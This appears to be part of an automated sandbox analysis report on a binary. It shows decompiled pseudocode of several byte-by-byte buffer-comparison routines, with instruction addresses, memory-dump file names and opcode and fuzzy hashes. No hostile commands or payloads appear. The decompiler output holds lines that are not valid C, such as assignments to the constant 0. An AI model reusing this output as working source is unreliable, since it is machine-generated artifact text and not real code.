    								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
    								if(_t313 == 0) {
    									L51:
    									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
    									if(_t315 == 0) {
    										L53:
    										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
    										if(_t317 == 0) {
    											L55:
    											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
    											if(_t246 != 0) {
    												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
    											}
    											goto L58;
    										}
    										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
    										if(_t246 != 0) {
    											goto L1;
    										}
    										goto L55;
    									}
    									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
    									if(_t246 != 0) {
    										goto L1;
    									}
    									goto L53;
    								}
    								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
    								if(_t246 != 0) {
    									goto L1;
    								}
    								goto L51;
    							}
    							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
    							if(_t319 == 0) {
    								L40:
    								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
    								if(_t321 == 0) {
    									L42:
    									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
    									if(_t323 == 0) {
    										L44:
    										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
    										if(_t246 != 0) {
    											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
    										}
    										goto L47;
    									}
    									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
    									if(_t246 != 0) {
    										goto L1;
    									}
    									goto L44;
    								}
    								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
    								if(_t246 != 0) {
    									goto L1;
    								}
    								goto L42;
    							}
    							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
    							if(_t246 != 0) {
    								goto L1;
    							}
    							goto L40;
    						}
    						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
    						if(_t325 == 0) {
    							L29:
    							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
    							if(_t327 == 0) {
    								L31:
    								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
    								if(_t329 == 0) {
    									L33:
    									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
    									if(_t246 != 0) {
    										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
    									}
    									goto L36;
    								}
    								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
    								if(_t246 != 0) {
    									goto L1;
    								}
    								goto L33;
    							}
    							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
    							if(_t246 != 0) {
    								goto L1;
    							}
    							goto L31;
    						}
    						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
    						if(_t246 != 0) {
    							goto L1;
    						}
    						goto L29;
    					}
    					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
    					if(_t331 == 0) {
    						L18:
    						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
    						if(_t333 == 0) {
    							L20:
    							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
    							if(_t335 == 0) {
    								L22:
    								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
    								if(_t246 != 0) {
    									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
    								}
    								goto L25;
    							}
    							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
    							if(_t246 != 0) {
    								goto L1;
    							}
    							goto L22;
    						}
    						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
    						if(_t246 != 0) {
    							goto L1;
    						}
    						goto L20;
    					}
    					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
    					if(_t246 != 0) {
    						goto L1;
    					}
    					goto L18;
    				} else {
    					__edi =  *(__esi - 0x1f) & 0x000000ff;
    					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
    					if(__edi == 0) {
    						L7:
    						__edi =  *(__esi - 0x1e) & 0x000000ff;
    						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
    						if(__edi == 0) {
    							L9:
    							__edi =  *(__esi - 0x1d) & 0x000000ff;
    							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
    							if(__edi == 0) {
    								L11:
    								__ecx =  *(__esi - 0x1c) & 0x000000ff;
    								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
    								if(__ecx != 0) {
    									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
    								}
    								goto L14;
    							}
    							0 = 0 | __edi > 0x00000000;
    							__ecx = (__edi > 0) * 2 != 1;
    							if((__edi > 0) * 2 != 1) {
    								goto L1;
    							}
    							goto L11;
    						}
    						0 = 0 | __edi > 0x00000000;
    						__ecx = (__edi > 0) * 2 != 1;
    						if((__edi > 0) * 2 != 1) {
    							goto L1;
    						}
    						goto L9;
    					}
    					0 = 0 | __edi > 0x00000000;
    					__ecx = (__edi > 0) * 2 != 1;
    					if((__edi > 0) * 2 != 1) {
    						goto L1;
    					}
    					goto L7;
    				}
    				L1:
    				_t197 = _t246;
    				return _t197;
    			}
































    0x00850548
    0x00850548
    0x0085054e
    0x008505d6
    0x008505d8
    0x008505da
    0x00000000
    0x00000000
    0x008505e0
    0x008505e6
    0x0085066d
    0x0085066f
    0x00850671
    0x00000000
    0x00000000
    0x00850677
    0x0085067d
    0x00850704
    0x00850706
    0x00850708
    0x00000000
    0x00000000
    0x0085070e
    0x00850714
    0x0085079b
    0x0085079d
    0x0085079f
    0x00000000
    0x00000000
    0x008507ab
    0x00850833
    0x00850835
    0x00850837
    0x00000000
    0x00000000
    0x0085083d
    0x00850843
    0x008508ca
    0x008508cc
    0x008508ce
    0x00000000
    0x00000000
    0x008508d4
    0x008508da
    0x00850961
    0x00850963
    0x00850965
    0x00000000
    0x00000000
    0x00850973
    0x00850975
    0x0085098d
    0x00850995
    0x00850997
    0x008500f0
    0x008500f8
    0x008500fa
    0x00850107
    0x00850107
    0x00000000
    0x008500fa
    0x008509a4
    0x008500ea
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x008500ea
    0x0085097e
    0x00850987
    0x00000000
    0x00000000
    0x00000000
    0x00850987
    0x008508e7
    0x008508e9
    0x00850901
    0x00850909
    0x0085090b
    0x00850923
    0x0085092b
    0x0085092d
    0x00850945
    0x0085094d
    0x0085094f
    0x00850958
    0x00850958
    0x00000000
    0x0085094f
    0x00850936
    0x0085093f
    0x00000000
    0x00000000
    0x00000000
    0x0085093f
    0x00850914
    0x0085091d
    0x00000000
    0x00000000
    0x00000000
    0x0085091d
    0x008508f2
    0x008508fb
    0x00000000
    0x00000000
    0x00000000
    0x008508fb
    0x00850850
    0x00850852
    0x0085086a
    0x00850872
    0x00850874
    0x0085088c
    0x00850894
    0x00850896
    0x008508ae
    0x008508b6
    0x008508b8
    0x008508c1
    0x008508c1
    0x00000000
    0x008508b8
    0x0085089f
    0x008508a8
    0x00000000
    0x00000000
    0x00000000
    0x008508a8
    0x0085087d
    0x00850886
    0x00000000
    0x00000000
    0x00000000
    0x00850886
    0x0085085b
    0x00850864
    0x00000000
    0x00000000
    0x00000000
    0x00850864
    0x008507b9
    0x008507bb
    0x008507d3
    0x008507db
    0x008507dd
    0x008507f5
    0x008507fd
    0x008507ff
    0x00850817
    0x0085081f
    0x00850821
    0x0085082a
    0x0085082a
    0x00000000
    0x00850821
    0x00850808
    0x00850811
    0x00000000
    0x00000000
    0x00000000
    0x00850811
    0x008507e6
    0x008507ef
    0x00000000
    0x00000000
    0x00000000
    0x008507ef
    0x008507c4
    0x008507cd
    0x00000000
    0x00000000
    0x00000000
    0x008507cd
    0x00850721
    0x00850723
    0x0085073b
    0x00850743
    0x00850745
    0x0085075d
    0x00850765
    0x00850767
    0x0085077f
    0x00850787
    0x00850789
    0x00850792
    0x00850792
    0x00000000
    0x00850789
    0x00850770
    0x00850779
    0x00000000
    0x00000000
    0x00000000
    0x00850779
    0x0085074e
    0x00850757
    0x00000000
    0x00000000
    0x00000000
    0x00850757
    0x0085072c
    0x00850735
    0x00000000
    0x00000000
    0x00000000
    0x00850735
    0x0085068a
    0x0085068c
    0x008506a4
    0x008506ac
    0x008506ae
    0x008506c6
    0x008506ce
    0x008506d0
    0x008506e8
    0x008506f0
    0x008506f2
    0x008506fb
    0x008506fb
    0x00000000
    0x008506f2
    0x008506d9
    0x008506e2
    0x00000000
    0x00000000
    0x00000000
    0x008506e2
    0x008506b7
    0x008506c0
    0x00000000
    0x00000000
    0x00000000
    0x008506c0
    0x00850695
    0x0085069e
    0x00000000
    0x00000000
    0x00000000
    0x0085069e
    0x008505f3
    0x008505f5
    0x0085060d
    0x00850615
    0x00850617
    0x0085062f
    0x00850637
    0x00850639
    0x00850651
    0x00850659
    0x0085065b
    0x00850664
    0x00850664
    0x00000000
    0x0085065b
    0x00850642
    0x0085064b
    0x00000000
    0x00000000
    0x00000000
    0x0085064b
    0x00850620
    0x00850629
    0x00000000
    0x00000000
    0x00000000
    0x00850629
    0x008505fe
    0x00850607
    0x00000000
    0x00000000
    0x00000000
    0x00850554
    0x00850558
    0x0085055c
    0x0085055e
    0x00850576
    0x00850576
    0x0085057e
    0x00850580
    0x00850598
    0x00850598
    0x008505a0
    0x008505a2
    0x008505ba
    0x008505ba
    0x008505c2
    0x008505c4
    0x008505cd
    0x008505cd
    0x00000000
    0x008505c4
    0x008505a8
    0x008505ab
    0x008505b4
    0x00000000
    0x00000000
    0x00000000
    0x008505b4
    0x00850586
    0x00850589
    0x00850592
    0x00000000
    0x00000000
    0x00000000
    0x00850592
    0x00850564
    0x00850567
    0x00850570
    0x00000000
    0x00000000
    0x00000000
    0x00850570
    0x0084fcd6
    0x0084fcd6
    0x00850ac7

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
    • Instruction ID: 00b7675b669e5976298a2a1d45eaef048582c0268b3514f829ed25b33f9aec32
    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
    • Instruction Fuzzy Hash: 73C187722051AB0BDF6D4639857453EBBA1BFA27B231A076DDCB2CB1C5FE10D528D920
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0084FCDE(void* __edx, void* __esi) {
    				signed int _t184;
    				signed char _t185;
    				signed char _t186;
    				signed char _t187;
    				signed char _t188;
    				signed char _t190;
    				signed int _t231;
    				void* _t275;
    				void* _t278;
    				void* _t280;
    				void* _t282;
    				void* _t284;
    				void* _t286;
    				void* _t288;
    				void* _t290;
    				void* _t292;
    				void* _t294;
    				void* _t296;
    				void* _t298;
    				void* _t300;
    				void* _t302;
    				void* _t304;
    				void* _t306;
    				void* _t308;
    				void* _t310;
    				void* _t312;
    				void* _t313;
    
    				_t313 = __esi;
    				_t275 = __edx;
    				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
    					_t231 = 0;
    					L11:
    					if(_t231 != 0) {
    						goto L1;
    					}
    					_t185 =  *(_t313 - 0x19);
    					if(_t185 ==  *(_t275 - 0x19)) {
    						_t231 = 0;
    						L22:
    						if(_t231 != 0) {
    							goto L1;
    						}
    						_t186 =  *(_t313 - 0x15);
    						if(_t186 ==  *(_t275 - 0x15)) {
    							_t231 = 0;
    							L33:
    							if(_t231 != 0) {
    								goto L1;
    							}
    							_t187 =  *(_t313 - 0x11);
    							if(_t187 ==  *(_t275 - 0x11)) {
    								_t231 = 0;
    								L44:
    								if(_t231 != 0) {
    									goto L1;
    								}
    								_t188 =  *(_t313 - 0xd);
    								if(_t188 ==  *(_t275 - 0xd)) {
    									_t231 = 0;
    									L55:
    									if(_t231 != 0) {
    										goto L1;
    									}
    									if( *(_t313 - 9) ==  *(_t275 - 9)) {
    										_t231 = 0;
    										L66:
    										if(_t231 != 0) {
    											goto L1;
    										}
    										_t190 =  *(_t313 - 5);
    										if(_t190 ==  *(_t275 - 5)) {
    											_t231 = 0;
    											L77:
    											if(_t231 == 0) {
    												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
    												if(_t231 != 0) {
    													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
    												}
    											}
    											goto L1;
    										}
    										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
    										if(_t278 == 0) {
    											L70:
    											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
    											if(_t280 == 0) {
    												L72:
    												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
    												if(_t282 == 0) {
    													L74:
    													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
    													if(_t231 != 0) {
    														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
    													}
    													goto L77;
    												}
    												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
    												if(_t231 != 0) {
    													goto L1;
    												}
    												goto L74;
    											}
    											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
    											if(_t231 != 0) {
    												goto L1;
    											}
    											goto L72;
    										}
    										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
    										if(_t231 != 0) {
    											goto L1;
    										}
    										goto L70;
    									}
    									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
    									if(_t284 == 0) {
    										L59:
    										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
    										if(_t286 == 0) {
    											L61:
    											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
    											if(_t288 == 0) {
    												L63:
    												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
    												if(_t231 != 0) {
    													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
    												}
    												goto L66;
    											}
    											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
    											if(_t231 != 0) {
    												goto L1;
    											}
    											goto L63;
    										}
    										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
    										if(_t231 != 0) {
    											goto L1;
    										}
    										goto L61;
    									}
    									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
    									if(_t231 != 0) {
    										goto L1;
    									}
    									goto L59;
    								}
    								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
    								if(_t290 == 0) {
    									L48:
    									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
    									if(_t292 == 0) {
    										L50:
    										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
    										if(_t294 == 0) {
    											L52:
    											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
    											if(_t231 != 0) {
    												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
    											}
    											goto L55;
    										}
    										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
    										if(_t231 != 0) {
    											goto L1;
    										}
    										goto L52;
    									}
    									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
    									if(_t231 != 0) {
    										goto L1;
    									}
    									goto L50;
    								}
    								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
    								if(_t231 != 0) {
    									goto L1;
    								}
    								goto L48;
    							}
    							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
    							if(_t296 == 0) {
    								L37:
    								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
    								if(_t298 == 0) {
    									L39:
    									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
    									if(_t300 == 0) {
    										L41:
    										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
    										if(_t231 != 0) {
    											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
    										}
    										goto L44;
    									}
    									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
    									if(_t231 != 0) {
    										goto L1;
    									}
    									goto L41;
    								}
    								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
    								if(_t231 != 0) {
    									goto L1;
    								}
    								goto L39;
    							}
    							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
    							if(_t231 != 0) {
    								goto L1;
    							}
    							goto L37;
    						}
    						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
    						if(_t302 == 0) {
    							L26:
    							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
    							if(_t304 == 0) {
    								L28:
    								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
    								if(_t306 == 0) {
    									L30:
    									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
    									if(_t231 != 0) {
    										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
    									}
    									goto L33;
    								}
    								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
    								if(_t231 != 0) {
    									goto L1;
    								}
    								goto L30;
    							}
    							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
    							if(_t231 != 0) {
    								goto L1;
    							}
    							goto L28;
    						}
    						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
    						if(_t231 != 0) {
    							goto L1;
    						}
    						goto L26;
    					}
    					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
    					if(_t308 == 0) {
    						L15:
    						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
    						if(_t310 == 0) {
    							L17:
    							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
    							if(_t312 == 0) {
    								L19:
    								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
    								if(_t231 != 0) {
    									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
    								}
    								goto L22;
    							}
    							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
    							if(_t231 != 0) {
    								goto L1;
    							}
    							goto L19;
    						}
    						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
    						if(_t231 != 0) {
    							goto L1;
    						}
    						goto L17;
    					}
    					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
    					if(_t231 != 0) {
    						goto L1;
    					}
    					goto L15;
    				} else {
    					__edi = __al & 0x000000ff;
    					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
    					if(__edi == 0) {
    						L4:
    						__edi =  *(__esi - 0x1c) & 0x000000ff;
    						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
    						if(__edi == 0) {
    							L6:
    							__edi =  *(__esi - 0x1b) & 0x000000ff;
    							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
    							if(__edi == 0) {
    								L8:
    								__ecx =  *(__esi - 0x1a) & 0x000000ff;
    								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
    								if(__ecx != 0) {
    									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
    								}
    								goto L11;
    							}
    							0 = 0 | __edi > 0x00000000;
    							__ecx = (__edi > 0) * 2 != 1;
    							if((__edi > 0) * 2 != 1) {
    								goto L1;
    							}
    							goto L8;
    						}
    						0 = 0 | __edi > 0x00000000;
    						__ecx = (__edi > 0) * 2 != 1;
    						if((__edi > 0) * 2 != 1) {
    							goto L1;
    						}
    						goto L6;
    					}
    					0 = 0 | __edi > 0x00000000;
    					__ecx = (__edi > 0) * 2 != 1;
    					if((__edi > 0) * 2 != 1) {
    						goto L1;
    					}
    					goto L4;
    				}
    				L1:
    				_t184 = _t231;
    				return _t184;
    			}






























    0x0084fcde
    0x0084fcde
    0x0084fce4
    0x0084fd5b
    0x0084fd5d
    0x0084fd5f
    0x00000000
    0x00000000
    0x0084fd65
    0x0084fd6b
    0x0084fdf2
    0x0084fdf4
    0x0084fdf6
    0x00000000
    0x00000000
    0x0084fdfc
    0x0084fe02
    0x0084fe89
    0x0084fe8b
    0x0084fe8d
    0x00000000
    0x00000000
    0x0084fe93
    0x0084fe99
    0x0084ff20
    0x0084ff22
    0x0084ff24
    0x00000000
    0x00000000
    0x0084ff2a
    0x0084ff30
    0x0084ffb7
    0x0084ffb9
    0x0084ffbb
    0x00000000
    0x00000000
    0x0084ffc7
    0x0085004f
    0x00850051
    0x00850053
    0x00000000
    0x00000000
    0x00850059
    0x0085005f
    0x008500e6
    0x008500e8
    0x008500ea
    0x008500f8
    0x008500fa
    0x00850107
    0x00850107
    0x008500fa
    0x00000000
    0x008500ea
    0x0085006c
    0x0085006e
    0x00850086
    0x0085008e
    0x00850090
    0x008500a8
    0x008500b0
    0x008500b2
    0x008500ca
    0x008500d2
    0x008500d4
    0x008500dd
    0x008500dd
    0x00000000
    0x008500d4
    0x008500bb
    0x008500c4
    0x00000000
    0x00000000
    0x00000000
    0x008500c4
    0x00850099
    0x008500a2
    0x00000000
    0x00000000
    0x00000000
    0x008500a2
    0x00850077
    0x00850080
    0x00000000
    0x00000000
    0x00000000
    0x00850080
    0x0084ffd5
    0x0084ffd7
    0x0084ffef
    0x0084fff7
    0x0084fff9
    0x00850011
    0x00850019
    0x0085001b
    0x00850033
    0x0085003b
    0x0085003d
    0x00850046
    0x00850046
    0x00000000
    0x0085003d
    0x00850024
    0x0085002d
    0x00000000
    0x00000000
    0x00000000
    0x0085002d
    0x00850002
    0x0085000b
    0x00000000
    0x00000000
    0x00000000
    0x0085000b
    0x0084ffe0
    0x0084ffe9
    0x00000000
    0x00000000
    0x00000000
    0x0084ffe9
    0x0084ff3d
    0x0084ff3f
    0x0084ff57
    0x0084ff5f
    0x0084ff61
    0x0084ff79
    0x0084ff81
    0x0084ff83
    0x0084ff9b
    0x0084ffa3
    0x0084ffa5
    0x0084ffae
    0x0084ffae
    0x00000000
    0x0084ffa5
    0x0084ff8c
    0x0084ff95
    0x00000000
    0x00000000
    0x00000000
    0x0084ff95
    0x0084ff6a
    0x0084ff73
    0x00000000
    0x00000000
    0x00000000
    0x0084ff73
    0x0084ff48
    0x0084ff51
    0x00000000
    0x00000000
    0x00000000
    0x0084ff51
    0x0084fea6
    0x0084fea8
    0x0084fec0
    0x0084fec8
    0x0084feca
    0x0084fee2
    0x0084feea
    0x0084feec
    0x0084ff04
    0x0084ff0c
    0x0084ff0e
    0x0084ff17
    0x0084ff17
    0x00000000
    0x0084ff0e
    0x0084fef5
    0x0084fefe
    0x00000000
    0x00000000
    0x00000000
    0x0084fefe
    0x0084fed3
    0x0084fedc
    0x00000000
    0x00000000
    0x00000000
    0x0084fedc
    0x0084feb1
    0x0084feba
    0x00000000
    0x00000000
    0x00000000
    0x0084feba
    0x0084fe0f
    0x0084fe11
    0x0084fe29
    0x0084fe31
    0x0084fe33
    0x0084fe4b
    0x0084fe53
    0x0084fe55
    0x0084fe6d
    0x0084fe75
    0x0084fe77
    0x0084fe80
    0x0084fe80
    0x00000000
    0x0084fe77
    0x0084fe5e
    0x0084fe67
    0x00000000
    0x00000000
    0x00000000
    0x0084fe67
    0x0084fe3c
    0x0084fe45
    0x00000000
    0x00000000
    0x00000000
    0x0084fe45
    0x0084fe1a
    0x0084fe23
    0x00000000
    0x00000000
    0x00000000
    0x0084fe23
    0x0084fd78
    0x0084fd7a
    0x0084fd92
    0x0084fd9a
    0x0084fd9c
    0x0084fdb4
    0x0084fdbc
    0x0084fdbe
    0x0084fdd6
    0x0084fdde
    0x0084fde0
    0x0084fde9
    0x0084fde9
    0x00000000
    0x0084fde0
    0x0084fdc7
    0x0084fdd0
    0x00000000
    0x00000000
    0x00000000
    0x0084fdd0
    0x0084fda5
    0x0084fdae
    0x00000000
    0x00000000
    0x00000000
    0x0084fdae
    0x0084fd83
    0x0084fd8c
    0x00000000
    0x00000000
    0x00000000
    0x0084fce6
    0x0084fce6
    0x0084fced
    0x0084fcef
    0x0084fd03
    0x0084fd03
    0x0084fd0b
    0x0084fd0d
    0x0084fd21
    0x0084fd21
    0x0084fd29
    0x0084fd2b
    0x0084fd3f
    0x0084fd3f
    0x0084fd47
    0x0084fd49
    0x0084fd52
    0x0084fd52
    0x00000000
    0x0084fd49
    0x0084fd31
    0x0084fd34
    0x0084fd3d
    0x00000000
    0x00000000
    0x00000000
    0x0084fd3d
    0x0084fd13
    0x0084fd16
    0x0084fd1f
    0x00000000
    0x00000000
    0x00000000
    0x0084fd1f
    0x0084fcf5
    0x0084fcf8
    0x0084fd01
    0x00000000
    0x00000000
    0x00000000
    0x0084fd01
    0x0084fcd6
    0x0084fcd6
    0x00850ac7

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
    • Instruction ID: 8a791b3d0287f0d8115e649a98e08b1d0c1558fc42cbb40871ec0c27798ee8e1
    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
    • Instruction Fuzzy Hash: EFC1857220516B0BDF2D4639857413EFAA1FBA27B131A077DD9B2CB1D6FE10C568D620
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0084F8C6(void* __edx, void* __esi) {
    				signed char _t177;
    				void* _t178;
    				signed char _t179;
    				signed char _t180;
    				signed char _t181;
    				signed char _t183;
    				signed char _t184;
    				void* _t228;
    				void* _t278;
    				void* _t281;
    				void* _t283;
    				void* _t285;
    				void* _t287;
    				void* _t289;
    				void* _t291;
    				void* _t293;
    				void* _t295;
    				void* _t297;
    				void* _t299;
    				void* _t301;
    				void* _t303;
    				void* _t305;
    				void* _t307;
    				void* _t309;
    				void* _t311;
    				void* _t313;
    				void* _t315;
    				void* _t317;
    				void* _t319;
    				void* _t321;
    				void* _t322;
    
    				_t322 = __esi;
    				_t278 = __edx;
    				_t177 =  *(__esi - 0x1c);
    				if(_t177 ==  *(__edx - 0x1c)) {
    					_t228 = 0;
    					L10:
    					if(_t228 != 0) {
    						L78:
    						_t178 = _t228;
    						return _t178;
    					}
    					_t179 =  *(_t322 - 0x18);
    					if(_t179 ==  *(_t278 - 0x18)) {
    						_t228 = 0;
    						L21:
    						if(_t228 != 0) {
    							goto L78;
    						}
    						_t180 =  *(_t322 - 0x14);
    						if(_t180 ==  *(_t278 - 0x14)) {
    							_t228 = 0;
    							L32:
    							if(_t228 != 0) {
    								goto L78;
    							}
    							_t181 =  *(_t322 - 0x10);
    							if(_t181 ==  *(_t278 - 0x10)) {
    								_t228 = 0;
    								L43:
    								if(_t228 != 0) {
    									goto L78;
    								}
    								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
    									_t228 = 0;
    									L54:
    									if(_t228 != 0) {
    										goto L78;
    									}
    									_t183 =  *(_t322 - 8);
    									if(_t183 ==  *(_t278 - 8)) {
    										_t228 = 0;
    										L65:
    										if(_t228 != 0) {
    											goto L78;
    										}
    										_t184 =  *(_t322 - 4);
    										if(_t184 ==  *(_t278 - 4)) {
    											_t228 = 0;
    											L76:
    											if(_t228 == 0) {
    												_t228 = 0;
    											}
    											goto L78;
    										}
    										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
